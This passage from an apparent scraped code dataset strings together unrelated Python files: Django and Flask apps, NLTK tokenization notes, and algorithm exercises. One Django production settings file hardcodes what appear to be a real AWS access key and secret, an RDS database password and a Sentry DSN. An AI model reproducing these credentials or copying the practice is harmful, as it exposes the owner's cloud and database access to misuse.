\"\"\"Provides helpers for date and time parsing.\"\"\"\n TIMESTAMP_FORMATS = (\n '%Y-%m-%dT%H:%M:%S',\n '%Y-%m-%d %H:%M:%S',\n '%Y:%m:%d %H:%M:%S',\n '%Y-%m-%dT%H:%M:%SZ',\n '%Y-%m-%dT%H:%M:%S%z',\n '%Y:%m:%d %H:%M:%SZ', # exif\n '%Z %Y-%m-%d %H:%M:%S',\n '%Y-%m-%d',\n '%Y%m%d',\n )\n\n def parse_timestamp(self, raw, fmt=None):\n if isinstance(raw, (datetime, date)):\n return raw\n text = stringify(raw)\n if text is None:\n return\n formats = ensure_list(fmt) or self.TIMESTAMP_FORMATS\n for fmt in formats:\n try:\n if '.' in text and '.' 
not in fmt:\n                    text, _ = text.split('.', 1)\n                return datetime.strptime(text, fmt)\n            except Exception:\n                pass\n        log.warning(\"Could not parse timestamp: %r\", raw)\n        return raw\n\n    def get_seconds(self, time_str):\n        \"\"\"Get Seconds from time\"\"\"\n        h, m, s = time_str.split(':')\n        return float(h) * 3600 + float(m) * 60 + float(s)\n\n\nclass CellebriteXMLSupport(object):\n    NS = \"http://pa.cellebrite.com/report/2.0\"\n    NSMAP = {\"ns\": NS}\n\n    def _item(self, meta, name):\n        query = './ns:item[@name=\"%s\"]/text()' % name\n        return meta.xpath(query, namespaces=self.NSMAP)\n\n    def _ns_tag(self, tag):\n        return '{{{0}}}{1}'.format(self.NS, tag)\n\n    def _field_values(self, el, name):\n        query = './ns:field[@name=\"%s\"]/ns:value/text()' % name\n        values = []\n        for value in el.xpath(query, namespaces=self.NSMAP):\n            value = stringify(value)\n            if value is not None:\n                values.append(value)\n        return list(sorted(values))\n\n    def _models(self, el, name):\n        query = \".//ns:model[@type='%s']\" % name\n        yield from el.xpath(query, namespaces=self.NSMAP)\n\n    def _get_party(self, names, identifiers, proof=None):\n        party = model.make_entity('LegalEntity')\n        if not names:\n            names = identifiers\n        party.add('name', names)\n        party.add('country', self.country)\n        party.add('proof', proof)\n\n        for identifier in sorted(identifiers, key=len, reverse=True):\n            prop = 'email' if '@' in identifier else 'phone'\n            party.add(prop, identifier)\n            if not party.id and party.get(prop):\n                party.make_id(self.project_id, identifier)\n\n        if not party.id and names:\n            party.make_id(self.project_id, *ensure_list(names))\n\n        return party\n","repo_name":"alephdata/followthemoney-cellebrite","sub_path":"ftmcellebrite/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72618330407","text":"from django.conf.urls import url,include\nfrom apps.profesores.views import index_profesor, nuevo_profesor,editar_profesor,eliminar_profesor\n\n\nurlpatterns = [\n    url(r'^$', index_profesor, name='index_profesor'),\n    url(r'^nuevo$', nuevo_profesor, name='nuevo_profesor'),\n    url(r'^editar/(?P<id>\d+)/$', editar_profesor, name='editar_profesor'),\n    url(r'^eliminar/(?P<id>\d+)/$', eliminar_profesor, name='eliminar_profesor'),\n]\n","repo_name":"defcon1983/project_bro_universidad","sub_path":"softcole-master/apps/profesores/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34241683823","text":"def checkbin():\n\tl=['0','1']\n\tf=0\n\tst=input()\n\tfor i in range(len(st)):\n\t\tif st[i] in l:\n\t\t\tcontinue\n\t\telse :\n\t\t\tf=1\n\t\t\tbreak\n\tif f!=1:\n\t\tprint('yes')\n\telse :\n\t\tprint('no')\n","repo_name":"Seetha1231/oddeven","sub_path":"be62.py","file_name":"be62.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33383807851","text":"#输入某年某月某日,判断这一天是这一年的第几天?\n# year = int(input('请输入年份:'))\n# month = int(input('请输入月份:'))\n# if month >12:\n# print('请输入正确的月份')\n# day = int(input('请输入日期:'))\n# month_1 = [1,3,5,7,8,10,12]\n# month_2 = [4,6,9,11]\n# count_1 = 0\n# count_2 = 0\n# for i in range(1,month):\n# if i in month_1:\n# count_1 +=1\n# if i in month_2:\n# count_2 +=1\n# if month > 2:\n# if (year % 400 == 0) or ((year % 4 == 0) and (year % 100 != 0)):\n# days = count_1 * 31 + count_2 * 30 + day + 
29\n# else:\n# days = count_1 * 31 + count_2 * 30 + day + 28\n# else:\n# days = day+31\n# print(days)\n\nyear = int(input('year: '))\nmonth = int(input('month: '))\nday = int(input('day: '))\n\nmonths = (0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334)\nif 0 < month <= 12:\n sum = months[month - 1]\nelse:\n print('data error')\nsum += day\nleap = 0\nif (year % 400 == 0) or ((year % 4 == 0) and (year % 100 != 0)):\n leap = 1\nif (leap == 1) and (month > 2):\n sum += 1\nprint('it is the %dth day.' % sum)\n\n\n\n\n\n\n\n","repo_name":"rage-vampire/Python","sub_path":"practise/Python应用实例/test22.py","file_name":"test22.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15124238492","text":"# Processing Raw Text(Tokenization & Stemming)\n\nimport nltk\nfrom __future__ import division\nimport re, pprint\n\n# Tokenization\ntokens = nltk.word_tokenize(\"hello world this is a nice day, hello world again\")\n# this is just a list\ntype(tokens)\ntokens\n# to make it be able to processed by techniques in Chapter I, put the tokenized tokens into nltk.Text()\ncorpus = nltk.Text(tokens)\ntype(corpus)\ncorpus[0]\ntokens.collocations()\ntokens.concordance(\"is\")\n# Customized Tokenization with RegEx\n# Noted!! -> (...) must be non-capture parenthesis(prefix with ?: such as (?:...)\ntext = 'That U.S.A. poster-print costs $12.40... , .'\npattern = r'''(?x) # set flag to allow comments\n (?:[A-Z]\\.)+ # abbreviations, e.g. U.S.A.\n |\\.\\.\\. # capture ...\n |\\w+(?:-\\w+)* #word with optional hyphens\n |\\$?\\d+(?:\\.\\d+)?%? # currency and percentages, e.g. $12.40, 82%\n | [][.,;\"'?():-_`] # these are separate tokens\n'''\nregexTokenizer = nltk.tokenize.RegexpTokenizer(pattern)\nregexTokenizer.tokenize(text)\n# Off-the-self Tokenizer -> split some punctuations and also keep them\n# May not be good enough...\nnltk.word_tokenize(\"hello ; hello; hello. . this.is this's\")\n\n# load gutenberg corpus\nfrom nltk.corpus import gutenberg\ngutenberg.fileids()\ncorpus = nltk.Text(gutenberg.words('melville-moby_dick.txt'))\ncorpus.collocations()\n# regular expression\n# (...) returned only words in (...)\ncorpus.findall(r\" (<.*>) \")\ncorpus.findall(r\" (<.*>) \")\ncorpus.findall(r\"<.*> <.*> \")\n\n# Text Normalization\nraw = \"\"\"DENNIS: Listen, strange women lying in ponds distributing swords\nis no basis for a system of government. 
Supreme executive power derives from\na mandate from the masses, not from some farcical aquatic ceremony.\"\"\"\ntokens = nltk.word_tokenize(raw)\ntokens\n# Porter Stemmers -> good for word indexing, information retrieval\nporter = nltk.PorterStemmer()\nstems = [porter.stem(t) for t in tokens]\nzip(tokens,stems)\n# WordNet Lemmatization -> good for pairing with WordNet relationship lookup\nwordNetStemmer = nltk.WordNetLemmatizer()\nstems = [wordNetStemmer.lemmatize(t) for t in tokens]\nzip(tokens,stems)","repo_name":"vitid/PythonNLTK","sub_path":"nltk_chapter3.py","file_name":"nltk_chapter3.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17640507535","text":"import sqlite3\n\nconn = sqlite3.connect('drill_1.db')\n\nwith conn:\n cur = conn.cursor()\n cur.execute(\"CREATE TABLE IF NOT EXISTS tbl_fList\\\n (ID INTEGER PRIMARY KEY AUTOINCREMENT, \\\n col_fileN TEXT \\\n )\")\n conn.commit()\n\n\n\nfileList = ('information.docx','Hello.txt','myImage.png', \\\n 'myMovie.mpg','World.txt','data.pdf','myPhoto.jpg')\nwith conn:\n for file in fileList:\n if file.endswith('.txt'):\n cur = conn.cursor()\n cur.execute(\"INSERT INTO tbl_fList(col_fileN) VALUES (?)\", \\\n (file,))\n print (file)\n \n\n \n\n\n","repo_name":"jlefler24/Python-Coding-Projects","sub_path":"sql_drill.py","file_name":"sql_drill.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73136012007","text":"from bisect import bisect_left\n\nn = int(input())\nports = list(map(int, input().split()))\n\n# 가장 긴 증가하는 부분 수열 \nresult = []\nfor port in ports:\n if len(result) == 0 or result[-1] < port:\n result.append(port)\n else:\n idx = bisect_left(result, port)\n result[idx] = port\n \nprint(len(result))\n","repo_name":"juajang/algorithm","sub_path":"Etc/반도체 설계.py","file_name":"반도체 설계.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74824159207","text":"from flask import Blueprint, request, jsonify, make_response\nfrom app import db\nfrom app.models.survey import Survey\nfrom .route_helpers import validate_model\nfrom sqlalchemy import desc\n\nsurveys_bp = Blueprint(\"survey\", __name__, url_prefix=\"/surveys\")\n\n\n@surveys_bp.route(\"\", methods=[\"GET\"])\ndef get_all_surveys():\n query = Survey.query\n\n survey_query = query.order_by(desc(Survey.date_survey_completed))\n\n surveys_response = [survey.to_dict() for survey in survey_query]\n\n return make_response(jsonify(surveys_response), 200)\n\n\n@surveys_bp.route(\"\", methods=[\"POST\"])\ndef create_survey():\n request_body = request.get_json()\n\n new_survey = Survey.from_dict(request_body)\n\n db.session.add(new_survey)\n db.session.commit()\n\n return jsonify(new_survey.to_dict()), 201\n\n\n@surveys_bp.route(\"/\", methods=[\"PUT\"])\ndef update_survey(survey_id):\n updated_survey = validate_model(Survey, survey_id)\n\n request_body = request.get_json()\n updated_survey.update_from_dict(request_body)\n\n db.session.commit()\n\n return jsonify(updated_survey.to_dict()), 200\n\n\n@surveys_bp.route(\"/\", methods=[\"DELETE\"])\ndef delete_survey(survey_id):\n survey_to_delete = validate_model(Survey, survey_id)\n\n db.session.delete(survey_to_delete)\n db.session.commit()\n\n return make_response(\n jsonify({\"details\": f\"Survey {survey_id} successfully deleted\"}), 
200\n )\n\n\n@surveys_bp.route(\"/\", methods=[\"PATCH\"])\ndef update_payment_balance(survey_id):\n survey = validate_model(Survey, survey_id)\n\n request_body = request.get_json()\n survey.update_from_dict(request_body)\n\n db.session.commit()\n\n return jsonify(survey.to_dict()), 200\n","repo_name":"adom2128/back-end-fgtracker","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5672151462","text":"# -*- coding: utf-8 -*-\nfrom .base import os, BASE_DIR, INSTALLED_APPS\nimport raven\n\nDEBUG = False\nALLOWED_HOSTS = ['*']\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'ebdb',\n 'USER': 'ebroot',\n 'PASSWORD': 'wodnjs2010',\n 'HOST': 'aa83nchg88wbbd.chhv3epwywiz.ap-northeast-2.rds.amazonaws.com',\n 'PORT': 3306,\n }\n}\n\nif 'RDS_DB_NAME' in os.environ:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': os.environ['RDS_DB_NAME'],\n 'USER': os.environ['RDS_USERNAME'],\n 'PASSWORD': os.environ['RDS_PASSWORD'],\n 'HOST': os.environ['RDS_HOSTNAME'],\n 'PORT': os.environ['RDS_PORT'],\n }\n }\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n)\n\nAWS_ACCESS_KEY_ID = 'AKIAIQ2DFL37RSVEDTAA'\nAWS_SECRET_ACCESS_KEY = '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'\n\nAWS_FILE_EXPIRE = 200\nAWS_PRELOAD_METADATA = False\nAWS_QUERYSTRING_AUTH = False\n\nDEFAULT_FILE_STORAGE = 'socialup.utils.MediaRootS3BotoStorage'\nSTATICFILES_STORAGE = 'socialup.utils.StaticRootS3BotoStorage'\nAWS_STORAGE_BUCKET_NAME = 'social-up'\nS3DIRECT_REGION = 'ap-northeast-2'\nS3_URL = '//%s.s3.amazonaws.com/' % AWS_STORAGE_BUCKET_NAME\nMEDIA_URL = 'https://%s.s3.amazonaws.com/media/' % AWS_STORAGE_BUCKET_NAME\nMEDIA_ROOT = MEDIA_URL\nSTATIC_URL = S3_URL + 'static/'\nADMIN_MEDIA_PREFIX = STATIC_URL + 'admin/'\n\nAWS_S3_HOST = 's3.%s.amazonaws.com' % S3DIRECT_REGION\n\nimport datetime\n\ntwo_months = datetime.timedelta(days=61)\ndate_two_months_later = datetime.date.today() + two_months\nexpires = date_two_months_later.strftime(\"%A, %d %B %Y 20:00:00 GMT\")\n\nAWS_HEADERS = {\n 'Expires': expires,\n 'Cache-Control': 'max-age=%d' % (int(two_months.total_seconds()),),\n}\n\n\ndef static_url(url):\n return os.path.join(STATIC_URL, url)\n\n\nSUMMERNOTE_CONFIG = {\n 'iframe': True,\n 'width': '100%',\n 'lang': 'ko-KR',\n 'attachment_require_authentication': True,\n 'default_css': (\n '/static/css/bootstrap.min.css',\n static_url('django_summernote/summernote.css'),\n static_url('django_summernote/django_summernote.css'),\n ),\n 'default_js': (\n '/static/js/jquery-2.2.4.min.js',\n '/static/js/bootstrap.min.js',\n static_url('django_summernote/jquery.ui.widget.js'),\n static_url('django_summernote/jquery.iframe-transport.js'),\n static_url('django_summernote/jquery.fileupload.js'),\n static_url('django_summernote/summernote.min.js'),\n ),\n}\n\nINSTALLED_APPS += ['raven.contrib.django.raven_compat', ]\n\n# sentry settings\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'root': {\n 'level': 'INFO',\n 'handlers': ['sentry'],\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s '\n '%(process)d %(thread)d %(message)s'\n },\n },\n 'handlers': {\n 'sentry': {\n 'level': 'INFO',\n 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',\n 'tags': {'custom-tag': 'x'},\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 
'formatter': 'verbose'\n }\n },\n 'loggers': {\n 'django.db.backends': {\n 'level': 'ERROR',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n },\n}\n\nRAVEN_CONFIG = {\n 'dsn': 'https://39c4c5642dae45a9a7bb5ade5234bda7:cd3ea0be19f64a8a917692d16d305a39@sentry.io/134317',\n}\n","repo_name":"springkjw/socialup","sub_path":"socialup/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33383807851","text":"\"\"\"2020 카카오 신입 개발자 블라인드 테스트 4: 가사 검색\n\n* 핵심 아이디어:\n 1. 쿼리의 중복이 가능하기 때문에 꼭 쿼리에 대한 memoization을 실시한다.\n\n* 알고리즘 순서:\n 1. 완전 탐색: 70점. 효율성 탈락\n 2. Trie 자료구조 사용: 100점\n\n\n문제 URL: https://programmers.co.kr/learn/courses/30/lessons/60060\n\"\"\"\n# 1. Exhaustive search solution\ndef solution(words, queries):\n query_dict = {}\n ans = []\n\n def match_or_not(word, query):\n if len(word) != len(query):\n return False\n\n wildcard_count = query.count('?')\n if query.startswith('?'): # 접두사\n return word[wildcard_count:] == query[wildcard_count:]\n else:\n return word[:len(word)-wildcard_count] == query[:len(word)-wildcard_count]\n\n for query in queries:\n if query in query_dict:\n ans.append(query_dict[query])\n continue\n\n count = sum(match_or_not(word, query) for word in words)\n ans.append(count)\n query_dict[query] = count\n\n return ans\n\n\n# 2. Trie 자료구조 이용\nclass Trie:\n def __init__(self, char=''):\n self.children = {}\n self.count = 0\n self.char = char\n\n\ndef solution(words, queries):\n MAX_SIZE = 10000\n tries = [Trie() for _ in range(MAX_SIZE+1)]\n tries_reversed = [Trie() for _ in range(MAX_SIZE+1)]\n ans = []\n\n for word_now in words:\n W = len(word_now)\n node = tries[W]\n node_reversed = tries_reversed[W]\n word_reversed = word_now[::-1]\n\n for word, node in ((word_now, node), (word_reversed, node_reversed)):\n for c in word:\n node.count += 1\n if c in node.children:\n node = node.children[c]\n else:\n new_node = Trie(c)\n node.children[c] = new_node\n node = new_node\n\n\n def count_match(query, wildcard_at_last=False):\n N = len(query)\n node = tries[N] if wildcard_at_last else tries_reversed[N]\n query = query if wildcard_at_last else query[::-1]\n\n for c in query:\n if c != '?':\n if c not in node.children:\n return 0\n node = node.children[c]\n else:\n break\n\n return node.count\n\n return [count_match(query, wildcard_at_last=query.endswith('?')) for query in queries]\n","repo_name":"shoark7/algorithm-with-python","sub_path":"problems_solving/kakao/2020-blind-algorithm-test/q4_lyrics_search.py","file_name":"q4_lyrics_search.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"37093845152","text":"from flask import Blueprint, jsonify, request\nimport asyncio\nfrom database.db import conn\nimport pandas as pd\nimport json\n\nimport os\nfrom os import getcwd\nfrom werkzeug.utils import secure_filename\n\nloop2 = asyncio.get_event_loop()\n\nmain=Blueprint('FileActionForecast_blueprint', __name__)\n\n@main.route('/NIKE/', methods=['POST'])\ndef add_file(year):\n try:\n parent_dir = \"D:\\\\Apps\\\\MasterApp\\\\back-app\\\\Files\\\\Cycle\\\\Forecast\"\n v_path = os.path.join(parent_dir, str(year))\n contenido = os.listdir(parent_dir)\n 
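# create the folder for this cycle year only if it does not already exist\n        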
if(len(contenido) == 0):\n            os.mkdir(v_path)\n        else:\n            if not os.path.exists(v_path):\n                os.mkdir(v_path)\n        x = request.files['File']\n        filename = x.filename\n        url = os.path.join(v_path, secure_filename(filename))\n        x.save(url)\n        with open('D:\\\\Apps\\\\MasterApp\\\\back-app\\\\routes\\\\File_ForecastName.json') as file:\n            data = json.load(file)\n\n        df = pd.DataFrame()\n        for a in range(len(data)):\n            if data[a]['Customer'] == 'NIKE':\n                for b in range(len(data[a]['Container']['Sheets'])):\n                    dct = {v: k for k, v in data[a]['Container']['Sheets'][b]['Column'].items()}\n                    file = open(url, \"rb\")\n                    z1 = pd.read_excel(file, sheet_name=data[a]['Container']['Sheets'][b]['Name'], header=data[a]['Container']['Sheets'][b]['PositionTitle'], usecols=list(data[a]['Container']['Sheets'][b]['Column'].values()) )\n                    file.close()\n                    z1 = z1.rename(dct, axis=1) \n                    if (len(df) == 0):\n                        df = z1\n                    else:\n                        df = pd.concat([df, z1], ignore_index=True)\n        df = df.fillna({'QuantityRequested':0})\n        df.drop(df[(df['QuantityRequested'] == 0)].index, inplace=True)\n        textSQL = \"\"\"\n        SELECT Style_GeneralInfo.StyleName, Style_WorkCenter.Style_WorkCenter, Style_GlobalCategory2.GlobalCategory, Style_Customer.Style_Customer\n        FROM Style_GlobalCategory2\n        INNER JOIN Style_Customer ON Style_GlobalCategory2.Id_Style_Customer = Style_Customer.Id_Style_Customer\n        INNER JOIN Style_WorkCenter ON Style_GlobalCategory2.Id_Style_GlobalCategory = Style_WorkCenter.Id_Style_GlobalCategory\n        INNER JOIN Style_GeneralInfo ON Style_WorkCenter.Id_Style_WorkCenter = Style_GeneralInfo.Id_Style_WorkCenter\n        \"\"\"\n        df_style = pd.json_normalize(loop2.run_until_complete(conn.runServer(textSQL)))\n        df_style['StyleName'] = df_style['StyleName'].astype(str)\n        df['StyleNumber'] = df['StyleNumber'].astype(str)\n        merge1 = df.merge(df_style, how='left', left_on=['StyleNumber'], right_on=['StyleName']) \n        merge1.to_excel(v_path + \"\\\\NIKE-Model.xlsx\", sheet_name='Sheet1', index=False)\n        result = merge1.to_json(orient=\"records\")\n        return result\n    except Exception as ex:\n        print(ex)\n        return jsonify({'message': str(ex)}), 500","repo_name":"MiguelCarcamo/MasterApp","sub_path":"back-app/routes/File_ActionForecast.py","file_name":"File_ActionForecast.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24313203234","text":"import math\n\n# function to find the longest word and also printing the reverse of each word in the string\ndef stringoperations(stringlist,stringinput):\n\n    # operating the string to print the longest word\n\n    # initializing an object to find the longest word\n    reqword = ''\n\n    # searching for the longest word in whole list\n    for word in stringlist:\n\n        # Comparing the lengths of every word among the set to find the longest one\n        if len(word) > len(reqword):\n            reqword = word\n    print ('The longest word in the string is:', reqword)\n\n    # operating on the string to print the reverse of the words in the string\n\n    # reversing the words and storing them into a list at a time\n    reversewords = [rev[::-1] for rev in stringlist]\n\n    # Joining the reversed words into a sentence\n    revsentence = \" \".join(reversewords)\n\n    # Printing the new sentence that is reversed\n    print('The reversed sentence is:', revsentence)\n\n\n    # Finding the middle words in the string\n\n    # Loading the length of the list into a variable\n    length = len(stringlist)\n\n    # If the number of words in the list are even, then we will have two middle 
words.\n # If the number of words in the list are odd, then we will have one middle word.\n\n # Checking if the string length is even or odd and then printing the middle words in the sentence.\n if (length%2 == 0):\n mid = int(length/2)\n # Printing the middle words if the number of words are even\n print(' The middle words are:', stringinput.split(\" \")[mid], stringinput.split(\" \")[mid-1])\n\n else:\n mid = int(length/2)\n # Printing the middle word if the number of words are odd\n print('The middle word is:', stringinput.split(\" \")[mid])\n\n\n# entering the string as input to perform verious operations\nstringinput = input(\"Enter the string on which you want to perform string operations:\")\n\n# Splitting the sentence into individual words\nstringlist = stringinput.split()\n\n# Calling the function to perform various operations on the string\nstringoperations(stringlist,stringinput)\n","repo_name":"Vamsikrishnachalla/Python-DeepLearning","sub_path":"Python LAB 1/source/stringoperations/string.py","file_name":"string.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27965849326","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n#https://www.acmicpc.net/problem/22970\n# l = one()\n# n_list = list(wow())\n# max_max = 0\n# for start in range(l):\n# le = 1\n# state = \"plus\"\n# number = \"none\"\n# for a in range(start,l):\n# if number == \"none\":\n# number = n_list[a]\n# else:\n# if state == \"plus\":\n# if number < n_list[a]:\n# number=n_list[a]\n# le+=1\n# elif number == n_list[a]:\n# break\n# else:\n# number = n_list[a]\n# le+=1\n# state = \"minus\"\n# else:\n# if number < n_list[a]:\n# break\n# elif number == n_list[a]:\n# break\n# else:\n# le+=1\n# number=n_list[a]\n# max_max = max(max_max,le)\n# print(max_max)\n\n#https://www.acmicpc.net/problem/4881\n# def go(num,n_dict):\n# if num not in n_dict:\n# n_dict[num]=1\n# else:\n# return\n# num = list(map(int,list(str(num))))\n# cnt = 0\n# for i in num:\n# cnt+=i**2\n# num = cnt\n# go(num,n_dict)\n \n# while True:\n# a,b = wow()\n# if a==b==0:\n# break\n# a_dict = {}\n# b_dict = {}\n# go(a,a_dict)\n# go(b,b_dict)\n# # print(a_dict)\n# # print(b_dict)\n# a_list = list(a_dict.keys())\n# b_list = list(b_dict.keys())\n# check = set(a_list)&set(b_list)\n# min_min = 100001\n# if len(check) != 0:\n# for i in check:\n# a_index = a_list.index(i)+1\n# b_index = b_list.index(i)+1\n# min_min=min(min_min,a_index+b_index)\n# print(a,b,min_min)\n# else:\n# print(a,b,0)\n\n#https://www.acmicpc.net/problem/1021\n# n,l = wow()\n# n_list = [i for i in range(1,n+1)]\n# a_list = list(wow())\n# cnt = 0\n# for i in a_list:\n# p_index = n_list.index(i)\n# m_index=len(n_list)-p_index\n# # print(n_list,p_index,i)\n# cnt+=min(p_index,m_index)\n# n_list = n_list[p_index:]+n_list[:p_index]\n# del n_list[n_list.index(i)]\n# # print(n_list,cnt)\n# print(cnt)\n\n#https://www.acmicpc.net/problem/1740\n# num = one()\n# index = 0\n# cnt = 0\n# for i in bin(num)[2:][::-1]:\n# cnt+=int(i)*(3**index)\n# index+=1\n# print(cnt)\n\n#https://www.acmicpc.net/problem/16439\n# n,l = wow()\n# n_list = [list(wow()) for _ in range(n)]\n# max_max = 0\n# n_dict = {}\n# for y in range(n):\n# for x in range(l):\n# if x not in n_dict:\n# n_dict[x]=[]\n# n_dict[x]+=[n_list[y][x]]\n\n# for a in range(l-2):\n# for b in range(a+1,l-1):\n# for c in range(b+1,l):\n# x=n_dict[a]\n# 
y=n_dict[b]\n# z=n_dict[c]\n# cnt = 0\n# for index in range(n):\n# count = max(x[index],y[index],z[index])\n# cnt+=count\n# max_max=max(cnt,max_max)\n# print(max_max)\n\n#https://www.acmicpc.net/problem/21920\n# import math\n# l = one()\n# n_list = list(wow())\n# num = one()\n# cnt = 0\n# count = 0\n# for i in n_list:\n# if math.gcd(i,num) == 1:\n# count+=1\n# cnt+=i\n# print(cnt/count)\n\n#https://www.acmicpc.net/problem/13414\n# n_dict = {}\n# limit,r = wow()\n# for _ in range(r):\n# a = inputing()\n# if len(a) == 8:\n# if a not in n_dict:\n# n_dict[a]=1\n# else:\n# del n_dict[a]\n# n_dict[a]=1\n# # print(n_dict)\n# print(*list(n_dict.keys())[:limit],sep=\"\\n\")\n \nnum = one()\ncnt = [0]\nn_dict = {}\ndef go(number):\n cnt[0]+=1\n cnt[0]%=1000000007\n if number in n_dict:\n return n_dict[number]\n if number < 2:\n print(number,n_dict,cnt)\n n_dict[number]=cnt[0]\n return\n else:\n print(\"wow\",number)\n return go(number-2)+go(number-1)\ngo(num)\nprint(n_dict[num-1],n_dict[num-2])\n\n\n\n\n\n\n\n\n\n\n\n \n \n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2022/11월/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29857301197","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport numpy as np\nimport tensorflow as tf\nimport tictactoe\n\nwith tf.Graph().as_default() as g:\n sess = tf.Session()\n meta_graph = tf.saved_model.loader.load(\n sess=sess,\n tags=[tf.saved_model.tag_constants.SERVING],\n export_dir=\"model\"\n )\n model_signature = meta_graph.signature_def[tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY]\n input_signature = model_signature.inputs\n output_signature = model_signature.outputs\n # Get names of input and output tensors\n input_tensor_name = input_signature[\"x\"].name\n output_tensor_name = output_signature[\"y\"].name\n # Get input and output tensors\n x_ph = sess.graph.get_tensor_by_name(input_tensor_name)\n y = sess.graph.get_tensor_by_name(output_tensor_name)\n\nenv = tictactoe.TicTacToeEnv()\nobservation = env.reset()\ndone = False\ninfo = None\n\nrule = \"\"\"\nInput your move!\n\n[0] top-left-square\n[1] top-middle-square\n[2] top-right-square\n[3] middle-left-square\n[4] middle-middle-square\n[5] middle-right-square\n[6] bottom-left-square\n[7] bottom-middle-square\n[8] bottom-right-square\n\"\"\"\n\nprint(rule)\n\nfor _ in range(9):\n env.render()\n if done:\n if info[\"x\"]:\n print(\"x win!\")\n elif info[\"o\"]:\n print(\"o win!\")\n else:\n print(\"Draw!\")\n break\n # Compute scores\n prob_x_win = -np.ones(9)\n prob_o_win = np.ones(9)\n # prob_draw = np.zeros(9)\n for i in range(9):\n if env.board[i] == 0:\n board_copy = np.array([env.board])\n board_copy[0][i] = 1\n prob = sess.run(y, feed_dict={x_ph: board_copy})\n # print i, prob\n prob_x_win[i] = prob[0][0]\n prob_o_win[i] = prob[0][1]\n # prob_draw = prob[0][2]\n # Decide CPU's move\n if max(prob_x_win) >= 0.05:\n cpu_move = prob_x_win.argmax()\n else:\n cpu_move = prob_o_win.argmin()\n _, _, done, info = env.step(cpu_move)\n env.render()\n if done:\n if info[\"x\"]:\n print(\"x win!\")\n elif info[\"o\"]:\n print(\"o win!\")\n else:\n print(\"Draw!\")\n break\n while True:\n sys.stdout.write(\"Input your move: \")\n player_move = input()\n _, _, done, info = env.step(player_move)\n if info[\"valid\"]:\n 
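# a valid move was accepted, so stop prompting\n            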
break\n","repo_name":"hephaex/deeplearning-note","sub_path":"3_ETRI-lecture/tictactoe/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"24313203234","text":"from compareV2 import Compare\nfrom many_extractorV2 import FeatureExtractor as fe\nimport pickle as pkl\n\n#create compare object\ncompOBJ = Compare() \n#import feature from compare objects\n#you can find all of vector data that you need \nfeatures = compOBJ.data\n# import single image by user : you can use another input methods\n#single_image_path = '/home/mahdi/Pictures/nike.png'\nsingle_image_path = input('image path : ')\n#product_id = 11111\nproduct_id = input('input product id : ')\n#create object of feature extractor on many_extractor file to make vector of single image.\nfe_obj = fe()\n#####################################################\nfeature_table = fe_obj.feature_table(single_image_path,product_id,'shape','texture','color','SIFT','SURF','KAZE')\nsimilarity_results = compOBJ.compare(feature_table,'shape','texture','color','SIFT','SURF','KAZE')\n\nwith open('compare_results.pkl','wb') as f:\n pkl.dump(similarity_results,f)\n\n\n\n","repo_name":"mahdisharifloo/autoEncoding_and_clustering","sub_path":"evoke_similarity/r_and_d/customizable/run_compareV2.py","file_name":"run_compareV2.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} 